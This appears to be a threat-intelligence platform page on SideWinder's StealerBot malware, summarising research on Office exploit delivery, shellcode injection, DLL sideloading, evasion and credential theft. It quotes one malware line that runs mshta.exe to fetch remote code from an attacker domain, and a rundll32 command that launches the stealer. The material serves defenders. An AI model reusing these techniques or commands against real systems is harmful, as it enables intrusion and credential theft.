Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Malicious Word and RTF files exploiting CVE-2017-0199 and CVE-2017-11882 were used as initial infection vectors... The RTF file exploits CVE-2017-11882, a memory corruption vulnerability in the legacy Equation Editor. It embeds shellcode encoded as a hexadecimal character string, which is executed upon opening the document to initiate the next stage of the attack. | The final stage delivers StealerBot, a credential stealer used for data exfiltration and persistent access, blending classic espionage with cybercrime-style credential harvesting.
Malicious Word and RTF files exploiting CVE-2017-0199 and CVE-2017-11882 were used as initial infection vectors... These vulnerabilities enable remote code execution through malicious Office documents: one by loading external content... The document contains an exploit for CVE-2017-0199, a vulnerability in Microsoft Office that allows remote code execution when a user opens a file that references an external object. | The final stage delivers StealerBot, a credential stealer used for data exfiltration and persistent access, blending classic espionage with cybercrime-style credential harvesting.
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The final stage delivers StealerBot, a credential stealer used for data exfiltration and persistent access, blending classic espionage with cybercrime-style credential harvesting.
34 distinct techniques documented for this family, organized by ATT&CK tactic.
The document uses the remote template injection technique to download an RTF file stored on a remote server controlled by the attacker.
The attackers used spear phishing emails paired with geofenced payloads to ensure that only victims in specific countries received the malicious content. Malicious Word and RTF files exploiting CVE-2017-0199 and CVE-2017-11882 were used as initial infection vectors.
By default, the malware starts a new “cmd.exe” process, forwards data received from the attacker to its standard input, and forwards the process output or error pipeline to the attacker.
The exploit file contained a shellcode... to run embedded JavaScript code invoking the mshtml . RunHTMLApplication function.
These vulnerabilities enable remote code execution through malicious Office documents: one by loading external content, the other by exploiting a memory corruption flaw in the legacy Equation Editor, leading to a potential system compromise when the victim opens a custom crafted file.
Once the process is found, the shellcode injects the embedded PE file into it using standard Windows API calls such as VirtualAllocEx and CreateRemoteThread (or NtCreateThreadEx). This marks the beginning of Stage 3, where the payload is executed within the context of the remote process. | The intrusion chain features multistage loaders, shellcode-based payload delivery... The RTF file exploits CVE-2017-11882... It embeds shellcode encoded as a hexadecimal character string, which is executed upon opening the document to initiate the next stage of the attack.
An LNK file is also created in the user's Startup folder (Start Menu\Programs\Startup\Gapic.lnk), which points to the execution of TapiUnattend.exe located in the APPDATA directory.
The payload shown above is encoded to evade static analysis and detection by signature-based tools... This data is decoded with a simple byte XOR, using the key 0x28.
After initializing the stack, the shellcode begins constructing and storing encoded strings directly onto the stack, which are later decoded at runtime as needed. These strings primarily contain API function names that are resolved dynamically during execution.
Once the process is found, the shellcode injects the embedded PE file into it using standard Windows API calls such as VirtualAllocEx and CreateRemoteThread (or NtCreateThreadEx). This marks the beginning of Stage 3, where the payload is executed within the context of the remote process. | The intrusion chain features multistage loaders, shellcode-based payload delivery... The RTF file exploits CVE-2017-11882... It embeds shellcode encoded as a hexadecimal character string, which is executed upon opening the document to initiate the next stage of the attack.
the embedded JavaScript runs the Windows utility mshta . exe and obtains additional code from a remote server
It also has an exported function named IceCream. This sample can be run with rundll32.exe without any issues: Rundll32.exe StealerBot.CppInstallerDocx.dll IceCream
The document contains an exploit for CVE-2017-0199... we can identify a relationship entry with TargetMode="External" pointing to a remote URL. This URL is used to load a malicious template (RTF) from an attacker-controlled server.
Additionally, the shellcode implements sandbox evasion techniques, performing a series of checks to determine whether it is running in a virtualized or emulated environment. It checks the size of the RAM... It looks for dotnetlogger32.dll
gShZVnyR.Run('mshta.exe https://dgtk.depo-govpk[.]com/19263687/trui',0);
The primary objective of this DLL installer is to establish persistence and facilitate the loading of the next stage through DLL sideloading of wdscore.dll, by exploiting the legitimate and trusted executable TapiUnattend.exe.
A separate credential-harvesting infrastructure cluster impersonated the Directorate General of Defence Purchase (DGDP), Directorate General of Forces Intelligence (DGFI), Bangladesh Air Force (BAF), Bangladesh Ordnance Factories (BOF), the national webmail portal (mail.gov.bd), and Bangladesh Police, funneling stolen credentials to centralized backend collection domains
This module uses the “SetWindowsHookEx” function specified in the “user32.dll” library to install a hook procedure and monitor low-level keyboard and mouse input events. The malware can log keystrokes...
The module is a .NET library designed to steal Google Chrome browser cookies and authentication tokens related to Facebook, LinkedIn and Google services...
It then collects basic system information and sends it to a hardcoded URL for the command-and-control server... Computer name... CPU model... List of drives and their capacity... Available physical memory... Available virtual memory... MAC address... information about installed antivirus software is also collected
The final stage delivers StealerBot, a credential stealer used for data exfiltration and persistent access... used for credential and information stealing
It also scans removable drives to steal files with specific extensions.
A separate credential-harvesting infrastructure cluster impersonated the Directorate General of Defence Purchase (DGDP), Directorate General of Forces Intelligence (DGFI), Bangladesh Air Force (BAF), Bangladesh Ordnance Factories (BOF), the national webmail portal (mail.gov.bd), and Bangladesh Police, funneling stolen credentials to centralized backend collection domains
It then collects basic system information and sends it to a hardcoded URL for the command-and-control server... The server's response is obfuscated using two layers of encoding
SideWinder (APT-C-17) is suspected to have links to India and is known for its multi-stage cyberattack campaigns in the Middle East.
373 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
6 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A SideWinder-exclusive modular in-memory espionage framework used as the final payload. Recovered modules include keylogging, reverse shell access, screenshot capture, file theft, UAC bypass, RDP credential theft, token grabbing from browsers and online services, and credential phishing via spoofed Windows credential prompts.
A custom post-exploitation malware/tool used by SideWinder in multi-stage campaigns, apparently for follow-on access and theft activities.
Credential-stealing malware delivered as the final payload in a multistage SideWinder intrusion chain. It collects system information, communicates with a C2 server, establishes persistence via DLL sideloading using TapiUnattend.exe and wdscore.dll, and is used for credential and information theft and data exfiltration.
A modular .NET espionage implant used post-compromise by SideWinder. It is loaded in memory by a backdoor loader and managed by an Orchestrator component that communicates with C2 to load plugins. Observed capabilities include installing additional malware, capturing screenshots, keylogging, stealing browser passwords and tokens, intercepting RDP credentials, stealing files, launching a reverse shell/live console, phishing Windows credentials, and bypassing UAC.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.